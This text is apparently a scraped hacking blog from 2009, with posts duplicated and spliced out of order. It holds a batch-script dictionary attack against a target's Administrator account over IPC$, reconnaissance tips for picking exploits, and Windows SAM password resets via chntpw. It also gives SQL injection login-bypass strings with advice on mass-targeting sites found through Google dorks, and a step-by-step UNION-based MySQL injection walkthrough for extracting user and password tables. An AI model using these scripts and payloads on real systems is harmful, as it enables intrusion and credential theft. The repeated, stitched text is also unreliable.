echo \\%1 \ipc$ acct: %2 pass: %%i >> output.txt && goto end
:fin
echo *****Done***** 3. Make sure that you have a Dictionary password Text file in the same location where you are going to execute this program. ( Name should be passlist.txt )
4. Now goto the command prompt and then execute this program from there, along with the Target compters IP address or Hostname and the Valid Username. The Syntax should be like this,...
C:\>LANbrute.bat 192.169.21.02 Administrator Where, LANbrute.bat - This is the Name of the batch file that resides in the C Drive. 192.169.21.02 - IP Address of the Target Computer. Administrator - Victim Account that you want to crack. 5. This program will start launching Dictionary Attack against the Adminstrator account on the Mahine 192.168.21.02 , by using the passwords from the file passlist.txt and will not stop until it finds a right match. 6. If the right password was found, then it will save it in a text file named 'output.txt' on the same directory.//Disclaimer : This is only meant for Educational Means, The owner[Roney] of this blog is not responsible for whatever you do with this.
You need a Dictionary text file to proceed further to launch this attack successfully. Just Follow the steps below, 1. Open up a Notepad file.
2. Copy and paste the below code and save it as a Batch file with.bat extension.@echo off
if "%1''=="" goto fin
if "%2''=="" goto fin
del logfile.txt
FOR /F "tokens=1'' %%i in (passlist.txt) do ^
echo %%i && ^
net use \\%1 \ipc$ %%i /u:%1 \%2 2>>logfile.txt && ^
echo %time% %date% >> output.txt && ^
echo \\%1 \ipc$ acct: %2 pass: %%i >> output.txt && goto end
:fin
echo *****Done***** 3. Make sure that you have a Dictionary password Text file in the same location where you are going to execute this program. ( Name should be passlist.txt )
4. Now goto the command prompt and then execute this program from there, along with the Target compters IP address or Hostname and the Valid Username. The Syntax should be like this,...
C:\>LANbrute.bat 192.169.21.02 Administrator Where, LANbrute.bat - This is the Name of the batch file that resides in the C Drive. 192.169.21.02 - IP Address of the Target Computer. Administrator - Victim Account that you want to crack. 5. This program will start launching Dictionary Attack against the Adminstrator account on the Mahine 192.168.21.02 , by using the passwords from the file passlist.txt and will not stop until it finds a right match. 6. If the right password was found, then it will save it in a text file named 'output.txt' on the same directory.//Disclaimer : This is only meant for Educational Means, The owner[Roney] of this blog is not responsible for whatever you do with this.
Information Gathering using Firefox
The First and foremost step in hacking would be the " Information Gathering ", many of them use various different Tools for the network Reconnaissance, but here is a trick that reveals you how to gather Information about the target system just by using a Browser "Firefox". The Information Gathering includes the following basics,.... Domain name and IP address
Open Ports
Daemon Banner Grabbing
OS Finger Printing
Server name and Type Well, Domain name is the prime thing that you need, at least to identify the target, obtaining the IP address can be done just by pinging. For the Open port detection, you might better go for third party tools and once the open ports are obtained you can use the telnet for the Daemon Banner grabbing, to know what the actual process thats running on the port along with its version info, so that you can easily launch an exploit to compromise the security if the daemon running on the target is a vulnerable one. Here comes the real tough part " OS Fingerprinting ", most of them use 'Nmap' for obtaining OS info and also it is the right choice for doing so. " Whois " - database will reveal what type of server is running on the target machine, but you can find it out just by using Firefox. You can really launch hell a lot of exploits if you know the server type on the target machine, and if it is IIS 6.0 or lesser, then it would make the task easier. Open up the Firefox browser, and browse the target website just like a legitimate user, and once done with it open up a new tab (CTRL + T) and close the previous tab, type "about:cache" in the URL and hit enter and it will list you the following... Memory cache device
Disk cache device
Offline cache device
Down below the "Disk cache device" click on the link that says " List Cache Entries ",
there you can see a brief history of the sites that you visited. Click on your target site's link and it will display you the server type along with its version in a clear text, also you ca find the packet Header, Request method whether it is a Post or Get.
and down below you can analyze the payload of the datagram shown in hexa- decimal values.
This part is real interesting and looks similar to a Sniffer. Now you got the server type and its version, and now you can launch exploits according to the version.
Open Ports
Daemon Banner Grabbing
OS Finger Printing
Server name and Type Well, Domain name is the prime thing that you need, at least to identify the target, obtaining the IP address can be done just by pinging. For the Open port detection, you might better go for third party tools and once the open ports are obtained you can use the telnet for the Daemon Banner grabbing, to know what the actual process thats running on the port along with its version info, so that you can easily launch an exploit to compromise the security if the daemon running on the target is a vulnerable one. Here comes the real tough part " OS Fingerprinting ", most of them use 'Nmap' for obtaining OS info and also it is the right choice for doing so. " Whois " - database will reveal what type of server is running on the target machine, but you can find it out just by using Firefox. You can really launch hell a lot of exploits if you know the server type on the target machine, and if it is IIS 6.0 or lesser, then it would make the task easier. Open up the Firefox browser, and browse the target website just like a legitimate user, and once done with it open up a new tab (CTRL + T) and close the previous tab, type "about:cache" in the URL and hit enter and it will list you the following... Memory cache device
Disk cache device
Offline cache device
Down below the "Disk cache device" click on the link that says " List Cache Entries ",
there you can see a brief history of the sites that you visited. Click on your target site's link and it will display you the server type along with its version in a clear text, also you ca find the packet Header, Request method whether it is a Post or Get.
and down below you can analyze the payload of the datagram shown in hexa- decimal values.
This part is real interesting and looks similar to a Sniffer. Now you got the server type and its version, and now you can launch exploits according to the version.
Hacking Windows Using Linux
here i m writing the trick which allows you to hack the admin password of windows using linux.
Firstly,Windows is installed on you computer and then you need a live CD of linux,here we will use a live CD of UBUNTU.
Boot from the Live CD and perform the 7 easy step to hack the windows Admin password.
Steps:
1: Install a program called chntpw
Command is: $ sudo apt-get install chntpw
The rpm pakage installed is the packege to change password.
2: After successfully installing chntpw, you have to access the Windows NTFS partition by mounting it and allowing read/write support.
Use Mount system Call.
3 : After that, navigate to WINDOWS/system32/config
use cd command to navigate.
4: Once inside the config directory, issue this command:
$ sudo chntpw SAM
Command to reset admin password.
As you are in Linux the security of windows is bypassed and the password can be changed easily.
5: A long display of information will follow.
Just ignore them.
6: Once you are prompted to reset the password , it is recommended to leave the password blank with an asterisk (*).
7: Reboot, with windows and you can now login to Windows with full administrative access.
The trick displayed here is for educational purpose only.
You might also like:
Best Web Resources for Linux
Install Linux(Portable) in Usb Drive
Transform Linux to Windows 7
LinkWithin
Firstly,Windows is installed on you computer and then you need a live CD of linux,here we will use a live CD of UBUNTU.
Boot from the Live CD and perform the 7 easy step to hack the windows Admin password.
Steps:
1: Install a program called chntpw
Command is: $ sudo apt-get install chntpw
The rpm pakage installed is the packege to change password.
2: After successfully installing chntpw, you have to access the Windows NTFS partition by mounting it and allowing read/write support.
Use Mount system Call.
3 : After that, navigate to WINDOWS/system32/config
use cd command to navigate.
4: Once inside the config directory, issue this command:
$ sudo chntpw SAM
Command to reset admin password.
As you are in Linux the security of windows is bypassed and the password can be changed easily.
5: A long display of information will follow.
Just ignore them.
6: Once you are prompted to reset the password , it is recommended to leave the password blank with an asterisk (*).
7: Reboot, with windows and you can now login to Windows with full administrative access.
The trick displayed here is for educational purpose only.
You might also like:
Best Web Resources for Linux
Install Linux(Portable) in Usb Drive
Transform Linux to Windows 7
LinkWithin
List Of Sql Injection Strings..
One of the major problems with SQL is its poor security issues surrounding is the login and url strings. This tutorial is not going to go into detail on why these string work as all these details have been given in my previous article Top 10 Tricks to exploit SQL Server Systems . First SEARCH the following Keywords in Google or any Search Engine: admin\login.asp
login.asp with these two search string you will have plenty of targets to chose from...choose one that is Vulnerable INJECTION STRINGS: How to use it? This is the easiest part...very simple On the login page just enter something like user:admin (you dont even have to put this.)
pass:' or 1 =1 - or user:' or 1 =1-
admin:' or 1 =1 - Some sites will have just a password so password:' or 1 =1- In fact I have compiled a combo list with strings like this to use on my chosen targets. There are plenty of strings in the list below. There are many other strings involving for instance UNION table access via reading the error pages table structure thus an attack with this method will reveal eventually admin U\P paths. The one I am interested in are quick access to targets PROGRAM i tried several programs to use with these search strings and upto now only Ares has peformed well with quite a bit of success with a combo list formatted this way. Yesteday I loaded 40 eastern targets with 18 positive hits in a few minutes how long would it take to go through 40 sites cutting and pasting each string combo example: admin:' or a=a-
admin:' or 1 =1 - And so on. You don't have to be admin and still can do anything you want. The most important part is example:' or 1 =1- this is our basic injection string Now the only trudge part is finding targets to exploit. So I tend to search say google for login.asp or whatever inurl:login.asp
index of:/admin/login.asp like this: index of login.asp result: http://www3 .google.com/search?hl=en&ie=I SO...G=Google+Search 17 ,000 possible targets trying various searches spews out plent more Now using proxy set in my browser I click through interesting targets. Seeing whats what on the site pages if interesting I then cut and paste URL as a possible target. After an hour or so you have a list of sites of potential targets like so http://www.somesite.com/login. asp
http://www.another.com/admin /login.asp and so on. In a couple of hours you can build up quite a list because I don't select all results or spider for log in pages. I then save the list fire up Ares and enter 1) A Proxy list
2) My Target IP list
3) My Combo list
4) Start. Now I dont want to go into problems with users using Ares..thing is i know it works for me... Sit back and wait. Any target vulnerable will show up in the hits box. Now when it finds a target it will spew all the strings on that site as vulnerable. You have to go through each one on the site by cutting and pasting the string till you find the right one. But the thing is you know you CAN access the site. Really I need a program that will return the hit with a click on url and ignore false outputs. I am still looking for it. This will saves quite a bit of time going to each site and each string to find its not exploitable. There you go you should have access to your vulnerable target by now Another thing you can use the strings in the urls were user=? edit the url to the = part and paste ' or 1 =1 - so it becomes user=' or 1 =1- just as quick as login process Combo List There are lot of other variations of the Injection String which I cannot put on my blog because that is Illegal. If you are interested I can send it to you through Email. Just write in your email address in comment and I will send it to you as early as possible but you need to remain patient it may take 1 or 2 days.
login.asp with these two search string you will have plenty of targets to chose from...choose one that is Vulnerable INJECTION STRINGS: How to use it? This is the easiest part...very simple On the login page just enter something like user:admin (you dont even have to put this.)
pass:' or 1 =1 - or user:' or 1 =1-
admin:' or 1 =1 - Some sites will have just a password so password:' or 1 =1- In fact I have compiled a combo list with strings like this to use on my chosen targets. There are plenty of strings in the list below. There are many other strings involving for instance UNION table access via reading the error pages table structure thus an attack with this method will reveal eventually admin U\P paths. The one I am interested in are quick access to targets PROGRAM i tried several programs to use with these search strings and upto now only Ares has peformed well with quite a bit of success with a combo list formatted this way. Yesteday I loaded 40 eastern targets with 18 positive hits in a few minutes how long would it take to go through 40 sites cutting and pasting each string combo example: admin:' or a=a-
admin:' or 1 =1 - And so on. You don't have to be admin and still can do anything you want. The most important part is example:' or 1 =1- this is our basic injection string Now the only trudge part is finding targets to exploit. So I tend to search say google for login.asp or whatever inurl:login.asp
index of:/admin/login.asp like this: index of login.asp result: http://www3 .google.com/search?hl=en&ie=I SO...G=Google+Search 17 ,000 possible targets trying various searches spews out plent more Now using proxy set in my browser I click through interesting targets. Seeing whats what on the site pages if interesting I then cut and paste URL as a possible target. After an hour or so you have a list of sites of potential targets like so http://www.somesite.com/login. asp
http://www.another.com/admin /login.asp and so on. In a couple of hours you can build up quite a list because I don't select all results or spider for log in pages. I then save the list fire up Ares and enter 1) A Proxy list
2) My Target IP list
3) My Combo list
4) Start. Now I dont want to go into problems with users using Ares..thing is i know it works for me... Sit back and wait. Any target vulnerable will show up in the hits box. Now when it finds a target it will spew all the strings on that site as vulnerable. You have to go through each one on the site by cutting and pasting the string till you find the right one. But the thing is you know you CAN access the site. Really I need a program that will return the hit with a click on url and ignore false outputs. I am still looking for it. This will saves quite a bit of time going to each site and each string to find its not exploitable. There you go you should have access to your vulnerable target by now Another thing you can use the strings in the urls were user=? edit the url to the = part and paste ' or 1 =1 - so it becomes user=' or 1 =1- just as quick as login process Combo List There are lot of other variations of the Injection String which I cannot put on my blog because that is Illegal. If you are interested I can send it to you through Email. Just write in your email address in comment and I will send it to you as early as possible but you need to remain patient it may take 1 or 2 days.
Monday, August 17, 2009
Hacking Password Protected Laptops
Password protecting a laptop does not ensure data protection, the password protection of laptops provides a false sense of security. Passwords on laptops are good to implement to prevent unauthorized access, however when a thief steals a laptop and has time, getting around the password is quite simple. There are also issues if there was no way to get around passwords, as even admins forget them and need access to the system. Passwords are good to have, but will not stop a thief from accessing the device, only slow them down a bit. Here is a quick run through of some common techniques for getting around the passwords for different platforms:
Windows XP & Vista
Windows can be cracked using several available tools one popular one is OphCrack, which is free. The software can works with Windows, Mac OS X and Linux. It comes with a LiveCD version which automates the retrieval, decryption, and cracking of passwords from a Windows system. The latest version uses a new faster technique using rainbow tables and can crack 99.99 % of alphanumeric passwords of up to 14 characters in usually a few seconds, and at most a few minutes. The software works with older versions of Windows as well. Another commerical product is Proactive Password Auditor from Elcomsoft. The software utilizes similar techniques to OphCrack but with a bit more automation and a friendlier user interface. The product basically makes password a mainstream technique that anyone can use to gain access to a system.
OS X
For OS X 10.4 The root password can be easily reset in OS X by booting the system from the Mac OS X installation CD and selecing the Reset password option under "Utilities" from the installer screen and follow the directions. OS X 10.5 can be reset using single user mode. (hold down 'Command' and 'S' during reboot or startup.) At the prompt, type fsck -fy Type mount -uw /Type launchctl load /System/Library/LaunchDaemo ns/com.apple.DirectoryServices. plist Type dscl. -passwd /Users/username newpassword replace with the real "username" and follow with the new password, as shown.
Linux
Boot Linux into single-user mode
Reboot the machine.
Press the ESC key while GRUB is loading to enter the menu.
If there is a 'recovery mode' option, select it and press 'b' to boot into single user mode.
Otherwise, the default boot configuration should be selected. Press 'e' to edit it.
Highlight the line that begins with 'kernel'. Press 'e' again to edit this line.
At the end of the line, add an additional parameter: 'single'. Hit return to make the change and press 'b' to boot.
Change the admin password
The system should load into single user mode and you'll be left at the command line automatically logged in as root. Type 'passwd' to change the root password or 'passwd someuser' to change the password for your "someuser" admin account.
Reboot
Enter 'reboot' to restart into your machine's normal configuration.
These are just a few techniques used to get around password protection on laptops. The first thing that should be implemented is making passwords longer, a 14 character password can be cracked in a matter of minutes. Most IT administrators require a password of 8 characters, this is not sufficient. It is better to devise a phrase instead of just a word.
Encryption, Encryption, Encryption
If you have sensitive information on your system, it is important to ensure that the data is encrypted, many operating systems have this built-in and there is also free encryption tools such as TrueCrypt that provide excellent encryption, so even if your password protected laptop is cracked, your data is still secure, just make sure you use a different password for your encrypted drive.
Windows XP & Vista
Windows can be cracked using several available tools one popular one is OphCrack, which is free. The software can works with Windows, Mac OS X and Linux. It comes with a LiveCD version which automates the retrieval, decryption, and cracking of passwords from a Windows system. The latest version uses a new faster technique using rainbow tables and can crack 99.99 % of alphanumeric passwords of up to 14 characters in usually a few seconds, and at most a few minutes. The software works with older versions of Windows as well. Another commerical product is Proactive Password Auditor from Elcomsoft. The software utilizes similar techniques to OphCrack but with a bit more automation and a friendlier user interface. The product basically makes password a mainstream technique that anyone can use to gain access to a system.
OS X
For OS X 10.4 The root password can be easily reset in OS X by booting the system from the Mac OS X installation CD and selecing the Reset password option under "Utilities" from the installer screen and follow the directions. OS X 10.5 can be reset using single user mode. (hold down 'Command' and 'S' during reboot or startup.) At the prompt, type fsck -fy Type mount -uw /Type launchctl load /System/Library/LaunchDaemo ns/com.apple.DirectoryServices. plist Type dscl. -passwd /Users/username newpassword replace with the real "username" and follow with the new password, as shown.
Linux
Boot Linux into single-user mode
Reboot the machine.
Press the ESC key while GRUB is loading to enter the menu.
If there is a 'recovery mode' option, select it and press 'b' to boot into single user mode.
Otherwise, the default boot configuration should be selected. Press 'e' to edit it.
Highlight the line that begins with 'kernel'. Press 'e' again to edit this line.
At the end of the line, add an additional parameter: 'single'. Hit return to make the change and press 'b' to boot.
Change the admin password
The system should load into single user mode and you'll be left at the command line automatically logged in as root. Type 'passwd' to change the root password or 'passwd someuser' to change the password for your "someuser" admin account.
Reboot
Enter 'reboot' to restart into your machine's normal configuration.
These are just a few techniques used to get around password protection on laptops. The first thing that should be implemented is making passwords longer, a 14 character password can be cracked in a matter of minutes. Most IT administrators require a password of 8 characters, this is not sufficient. It is better to devise a phrase instead of just a word.
Encryption, Encryption, Encryption
If you have sensitive information on your system, it is important to ensure that the data is encrypted, many operating systems have this built-in and there is also free encryption tools such as TrueCrypt that provide excellent encryption, so even if your password protected laptop is cracked, your data is still secure, just make sure you use a different password for your encrypted drive.
Friday, August 14, 2009
MYSQL TUTORIAL PART 2
Sub-section 2 :
Find the number of columns
So, now its time to find the number of columns present. For this purpose, we will be using 'order by' until we get error.
That is, we make our URL query as:
www.site.com/article.php?id=5 order by 1/*
//this didn't give error.
Now, I do increase it to 2.
www.site.com/article.php?id=5 order by 2/*
//still no error
So, we need to increase until we get the error.
In my example, I got error when I put the value 3 i.e.
www.site.com/article.php?id=5 order by 3/*
//this gave me error.
So, it means there are 2 columns in the current table (3- 1 =2). This is how we find the number of columns.
Sub-section 3 :
Addressing Vulnerable Part:
Now, we need to use union statement & find the column which we can replace so as to see the secret data on the page.
First lets craft the union statement which won't error.. This becomes like this:
www.site.com/article.php?id=5 UNION ALL SELECT null/*
This would error because our query needs to have one more null there.. Also null doesn't cause any type conversion error as it is just null..
So for our injection, it becomes:
www.site.com/article.php?id=5 UNION ALL SELECT null,null/*
For this we do:
www.site.com/article.php?id=5 UNION ALL SELECT 1 ,2/*
Now we will see the number(s) on the page somewhere. I mean, either 1 or 2 or both 1 & 2 are seen on the page. Note that the number may be displayed anywhere like in the title of the page or sometime even in the hidden tags in the source.. So, this means we can replace the number with our commands to display the private data the DB holds.
In my example, 1 is seen on the page. This means, I should replace 1 with my things to proceed further. Got it?? So lets move forward.
Quick note: Sometime the numbers may not be displayed so it becomes hard for you to find the column which you can use to steal the data.. So in that case, you may try something like below:
www.site.com/article.php?id=5 UNION ALL SELECT xyz123,null/*
or
www.site.com/article.php?id=5 UNION ALL SELECT null,xyz123/*
If xyz123 is displayed somewhere in the page, you may go further for injection replacing the text part... Here, I have kept text instead of integer to check if text is displayed... Also, be sure to check source because sometimes they may be in some hidden tags..
CTD...
Sub-section 4 :
Finding MySQL version:
For our injection, it is necessary to find the MySQL version bcoz if it is 5, our job becomes lot easier. To check the version, there is a function @@version or version().
So, what we do is replace 1(which is the replaceable part) with @@version i.e. we do as below:
www.site.com/article.php?id=5 UNION ALL SELECT @@version,2/*
or
www.site.com/article.php?id=5 UNION ALL SELECT version (),2/*
So, this would return the version of MySQL running on the server.
But, sometimes u may get error with above query. If that is the case, do use of unhex(hex()) function like this:
www.site.com/article.php?id=UN ION ALL SELECT unhex(hex (@@version)),2/*
Remember that if u have to use unhex(hex()) function here, u will also have to use this function in the injection process later on.
@@version will give u the version. It may be either 4 (or below) or 5 & above. I m now going to discuss the injection process for version 5 and 4 separately coz as I said earlier, version 5 makes it easy for us to perform the injection.
Quick note: Also, you may check for user, database,etc.. by using following:
www.site.com/article.php?id=5 UNION ALL SELECT user (),2/*
http://www.site.com/article.ph p?id=5 UNION ALL SELECT database(),2/*
Sub-section 5 :
MySQL 5 or above injection:
Here, I m gonna show u how to access data in the server running MySQL 5 or above.
U got MySQL version 5.0.27 standard using the @@version in url parameter. MySQL from version 5 has a useful function called information_schema. This is table that holds information about the tables and columns present in the DB server. That is, it contains name of all tables and columns of the site.
For getting table list, we use: table_name from information_schema.tables
For getting column list, we use: column_name from information_schema.columns
So our query for getting the table list in our example would be:
www.site.com/article.php?id=5 UNION ALL SELECT table_name,2 FROM information_schema.tables/*
And yeah if u had to use unhex(hex()) while finding version, u will have to do:
www.site.com/article.php?id=5 UNION ALL SELECT unhex (hex(table_name)),2 FROM information_schema.tables/*
This will list all the tables present in the DB. For our purpose, we will be searching for the table containing the user and password information. So we look the probable table with that information. U can even write down the table names for further reference and works. For my example, I would use the tbluser as the table that contains user & password.
Similarly, to get the column list, we would make our query as:
www.site.com/article.php?id=5 UNION ALL SELECT column_name,2 FROM information_schema.columns/*
This returns all the columns present in the DB server. Now from this listing, we will look for the probable columns for username and password. For my injection, there are two columns holding these info. They are username and password respectively. Succeed in above and then comment here to get more info
Find the number of columns
So, now its time to find the number of columns present. For this purpose, we will be using 'order by' until we get error.
That is, we make our URL query as:
www.site.com/article.php?id=5 order by 1/*
//this didn't give error.
Now, I do increase it to 2.
www.site.com/article.php?id=5 order by 2/*
//still no error
So, we need to increase until we get the error.
In my example, I got error when I put the value 3 i.e.
www.site.com/article.php?id=5 order by 3/*
//this gave me error.
So, it means there are 2 columns in the current table (3- 1 =2). This is how we find the number of columns.
Sub-section 3 :
Addressing Vulnerable Part:
Now, we need to use union statement & find the column which we can replace so as to see the secret data on the page.
First lets craft the union statement which won't error.. This becomes like this:
www.site.com/article.php?id=5 UNION ALL SELECT null/*
This would error because our query needs to have one more null there.. Also null doesn't cause any type conversion error as it is just null..
So for our injection, it becomes:
www.site.com/article.php?id=5 UNION ALL SELECT null,null/*
For this we do:
www.site.com/article.php?id=5 UNION ALL SELECT 1 ,2/*
Now we will see the number(s) on the page somewhere. I mean, either 1 or 2 or both 1 & 2 are seen on the page. Note that the number may be displayed anywhere like in the title of the page or sometime even in the hidden tags in the source.. So, this means we can replace the number with our commands to display the private data the DB holds.
In my example, 1 is seen on the page. This means, I should replace 1 with my things to proceed further. Got it?? So lets move forward.
Quick note: Sometime the numbers may not be displayed so it becomes hard for you to find the column which you can use to steal the data.. So in that case, you may try something like below:
www.site.com/article.php?id=5 UNION ALL SELECT xyz123,null/*
or
www.site.com/article.php?id=5 UNION ALL SELECT null,xyz123/*
If xyz123 is displayed somewhere in the page, you may go further for injection replacing the text part... Here, I have kept text instead of integer to check if text is displayed... Also, be sure to check source because sometimes they may be in some hidden tags..
CTD...
Sub-section 4 :
Finding MySQL version:
For our injection, it is necessary to find the MySQL version bcoz if it is 5, our job becomes lot easier. To check the version, there is a function @@version or version().
So, what we do is replace 1(which is the replaceable part) with @@version i.e. we do as below:
www.site.com/article.php?id=5 UNION ALL SELECT @@version,2/*
or
www.site.com/article.php?id=5 UNION ALL SELECT version (),2/*
So, this would return the version of MySQL running on the server.
But, sometimes u may get error with above query. If that is the case, do use of unhex(hex()) function like this:
www.site.com/article.php?id=UN ION ALL SELECT unhex(hex (@@version)),2/*
Remember that if u have to use unhex(hex()) function here, u will also have to use this function in the injection process later on.
@@version will give u the version. It may be either 4 (or below) or 5 & above. I m now going to discuss the injection process for version 5 and 4 separately coz as I said earlier, version 5 makes it easy for us to perform the injection.
Quick note: Also, you may check for user, database,etc.. by using following:
www.site.com/article.php?id=5 UNION ALL SELECT user (),2/*
http://www.site.com/article.ph p?id=5 UNION ALL SELECT database(),2/*
Sub-section 5 :
MySQL 5 or above injection:
Here, I m gonna show u how to access data in the server running MySQL 5 or above.
U got MySQL version 5.0.27 standard using the @@version in url parameter. MySQL from version 5 has a useful function called information_schema. This is table that holds information about the tables and columns present in the DB server. That is, it contains name of all tables and columns of the site.
For getting table list, we use: table_name from information_schema.tables
For getting column list, we use: column_name from information_schema.columns
So our query for getting the table list in our example would be:
www.site.com/article.php?id=5 UNION ALL SELECT table_name,2 FROM information_schema.tables/*
And yeah if u had to use unhex(hex()) while finding version, u will have to do:
www.site.com/article.php?id=5 UNION ALL SELECT unhex (hex(table_name)),2 FROM information_schema.tables/*
This will list all the tables present in the DB. For our purpose, we will be searching for the table containing the user and password information. So we look the probable table with that information. U can even write down the table names for further reference and works. For my example, I would use the tbluser as the table that contains user & password.
Similarly, to get the column list, we would make our query as:
www.site.com/article.php?id=5 UNION ALL SELECT column_name,2 FROM information_schema.columns/*
This returns all the columns present in the DB server. Now from this listing, we will look for the probable columns for username and password. For my injection, there are two columns holding these info. They are username and password respectively. Succeed in above and then comment here to get more info
MySQL Injection Tutorial Described
TABLE OF CONTENT:
#INTRO
#WHAT IS DATABASE?
#WHAT IS SQL INJECTION?
#BYPASSING LOGINS
#ACCESSING SECRET DATA
#Checking for vulnerability
#Find the number of columns
#Addressing vulnerable part
#Finding MySQL version
#MySQL 5 or above injection
#MySQL 4 injection
#MODIFYING SITE CONTENT
#SHUTTING DOWN THE MySQL SERVER
#LOADFILE
#MySQL ROOT
#MAJOR MySQL COMMANDS
#FINALIZING THE INJECTION TUTORIAL
#REFERENCES
#SECURITY SITES
#WARGAMEZ SITES
#GREETZ AND SHOUTZ
#THE END
INTRO!!
In this tutorial, I will demonstrate the infamous MySQL injection in newbie perspective so that all the newbies become able to become successful SQL injector. But, be sure to check various php & mysql functions in various sites which will help you a lot... lets begin our walkthrough of SQL injection.
WHAT IS DATABASE?
Just general info.. Database is the application that stores a collection of data. Database offers various APIs for creating, accessing and managing the data it holds. And database(DB) servers can be integrated with our web development so that we can pick up the things we want from the database without much difficulties. DB may hold various critical informations like usernames, passwords, credit cares,etc. So, DB need to be secured but many DB servers running are insecured either bcoz of their vulnerability or bcoz of poor programming handles. To name few DB servers, MySQL(Open source), MSSQL, MS-ACCESS, Oracle, Postgre SQL(open source), SQLite, etc.
WHAT IS SQL INJECTION?
SQL injection is probably the most abundant programming flaw that exists on the internet at present. It is the vulnerability through which unauthorized person can access the various critical and private dat. SQL injection is not a flaw in the web or db server but but is a result of the poor and inexperienced programming practices. And it is one of the deadliest as well as easiest attack to execute from remote location.
In SQL injection, we interact with DB server with the various commands and get various data from it. In this tutorial, I would be discussing 3 aspects of SQL injection namely bypassing logins, accessing the secret data and modifying the page contents. So lets head forward on our real walkthrough..
CTD...
BYPASSING LOGINS
Suppose, a site has a login form & only the registered users are allowed to enter the site. Now, say u wanted to bypass the login and enter the site as the legitimate user. If the login scriptblock is not properly sanitized by the programmer, u may have luck to enter the site. U might be able to login into the site without knowing the real username and real password by just interacting with the DB server. So, isn't that the beauty of SQL injection??
Let's see an example, where the username admin with the password pass123 can login to the site. Suppose, the SQL query for this is carried out as below:
SELECT USER from database WHERE username='admin' AND password='pass123'
And if above SELECT command evaluates true, user will be given access to the site otherwise not. Think what we could do if the scriptblock is not sanitized. This opens a door for the hackers to gain illegal access to the site.
In this example, the attacker can enter the following user data in the login form:
username: a or 1 =1--
password:blank
So, this would make our query as:
SELECT USER from database WHERE username='a' or 1 =1-- AND password=''
Note that -- is the comment operator and anything after it will be ignored as a comment. There exists another comment operator which is /*.
So our above query becomes:
SELECT USER from database WHERE username='a' or 1 =1
Now this query evaluates true even if there is no user called 'a' bcoz 1 =1 is always true and using OR makes the query return true when one of the query is true. And this gives access to the site admin panel.
There can be various other username and password combinations to play with the vulnerable sites. U can create ur own new combinations for the site login.
Few such combinations are:
username:' or 1 ='1 password:' or 1 ='1
username:' or '1 '='1 ' password:' or '1 '='1'
username:or 1 =1 password:or 1 =1
and there are many more cheat sheets. Just google. In fact, you can create your own such combination to bypass logins..
That's all about bypassing logins.
CTD...
ACCESSING SECRET DATA
SQL injection is not essentially done for bypassing logins only but it is also used for accessing the sensitive and secret data in the DB servers. This part is long, so I would be discussing in the subsections.
Sub-section 1 :
Checking for vulnerability
Suppose, u got a site:
http://www.site.com/article.ph p?id=5
Now to check if it is vulnerable, u would simply add ' in the end i.e. where id variable is assigned.
So, it is:
www.site.com/article.php?id=5'
Now if the site is not vulnerable, it filters and the page loads normally.
But, if it doesn't filter the query string, it would give the error something like below:
"MySQL Syntax Error By '5 '' In Article.php on line 15."
or
error that says us to check the correct MySQL version or MySQL Fetch error or sometimes just blank page. The error may be in any form. So it makes us sure that the site is vulnerable.
Also just using ' may not be the sure test; so you may try different things like:
www.site.com/article.php?id=5 union select 1--
If you get error with this, you again come to know that its vulnerable... Just try different things..
Read part 2 to continue...
#INTRO
#WHAT IS DATABASE?
#WHAT IS SQL INJECTION?
#BYPASSING LOGINS
#ACCESSING SECRET DATA
#Checking for vulnerability
#Find the number of columns
#Addressing vulnerable part
#Finding MySQL version
#MySQL 5 or above injection
#MySQL 4 injection
#MODIFYING SITE CONTENT
#SHUTTING DOWN THE MySQL SERVER
#LOADFILE
#MySQL ROOT
#MAJOR MySQL COMMANDS
#FINALIZING THE INJECTION TUTORIAL
#REFERENCES
#SECURITY SITES
#WARGAMEZ SITES
#GREETZ AND SHOUTZ
#THE END
INTRO!!
In this tutorial, I will demonstrate the infamous MySQL injection in newbie perspective so that all the newbies become able to become successful SQL injector. But, be sure to check various php & mysql functions in various sites which will help you a lot... lets begin our walkthrough of SQL injection.
WHAT IS DATABASE?
Just general info.. Database is the application that stores a collection of data. Database offers various APIs for creating, accessing and managing the data it holds. And database(DB) servers can be integrated with our web development so that we can pick up the things we want from the database without much difficulties. DB may hold various critical informations like usernames, passwords, credit cares,etc. So, DB need to be secured but many DB servers running are insecured either bcoz of their vulnerability or bcoz of poor programming handles. To name few DB servers, MySQL(Open source), MSSQL, MS-ACCESS, Oracle, Postgre SQL(open source), SQLite, etc.
WHAT IS SQL INJECTION?
SQL injection is probably the most abundant programming flaw that exists on the internet at present. It is the vulnerability through which unauthorized person can access the various critical and private dat. SQL injection is not a flaw in the web or db server but but is a result of the poor and inexperienced programming practices. And it is one of the deadliest as well as easiest attack to execute from remote location.
In SQL injection, we interact with DB server with the various commands and get various data from it. In this tutorial, I would be discussing 3 aspects of SQL injection namely bypassing logins, accessing the secret data and modifying the page contents. So lets head forward on our real walkthrough..
CTD...
BYPASSING LOGINS
Suppose, a site has a login form & only the registered users are allowed to enter the site. Now, say u wanted to bypass the login and enter the site as the legitimate user. If the login scriptblock is not properly sanitized by the programmer, u may have luck to enter the site. U might be able to login into the site without knowing the real username and real password by just interacting with the DB server. So, isn't that the beauty of SQL injection??
Let's see an example, where the username admin with the password pass123 can login to the site. Suppose, the SQL query for this is carried out as below:
SELECT USER from database WHERE username='admin' AND password='pass123'
And if above SELECT command evaluates true, user will be given access to the site otherwise not. Think what we could do if the scriptblock is not sanitized. This opens a door for the hackers to gain illegal access to the site.
In this example, the attacker can enter the following user data in the login form:
username: a or 1 =1--
password:blank
So, this would make our query as:
SELECT USER from database WHERE username='a' or 1 =1-- AND password=''
Note that -- is the comment operator and anything after it will be ignored as a comment. There exists another comment operator which is /*.
So our above query becomes:
SELECT USER from database WHERE username='a' or 1 =1
Now this query evaluates true even if there is no user called 'a' bcoz 1 =1 is always true and using OR makes the query return true when one of the query is true. And this gives access to the site admin panel.
There can be various other username and password combinations to play with the vulnerable sites. U can create ur own new combinations for the site login.
Few such combinations are:
username:' or 1 ='1 password:' or 1 ='1
username:' or '1 '='1 ' password:' or '1 '='1'
username:or 1 =1 password:or 1 =1
and there are many more cheat sheets. Just google. In fact, you can create your own such combination to bypass logins..
That's all about bypassing logins.
CTD...
ACCESSING SECRET DATA
SQL injection is not essentially done for bypassing logins only but it is also used for accessing the sensitive and secret data in the DB servers. This part is long, so I would be discussing in the subsections.
Sub-section 1 :
Checking for vulnerability
Suppose, u got a site:
http://www.site.com/article.ph p?id=5
Now to check if it is vulnerable, u would simply add ' in the end i.e. where id variable is assigned.
So, it is:
www.site.com/article.php?id=5'
